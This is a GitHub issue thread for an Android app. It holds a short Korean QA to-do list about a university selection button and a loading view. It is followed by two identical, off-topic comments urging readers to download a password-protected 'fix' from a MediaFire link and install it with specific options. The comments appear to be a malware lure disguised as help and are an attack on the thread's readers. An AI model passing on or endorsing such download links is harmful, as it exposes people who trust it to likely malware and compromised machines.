### ISSUE TITLE
[Fix] 2차 기획 QA

### ISSUE THREAD

**Issue by 0se0** [Team-Hankki/hankki-android#225]
## 🚩 TO DO
- [ ] 대학 선택 리스트 버튼 막기
- [x] 로딩뷰 추가하기

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
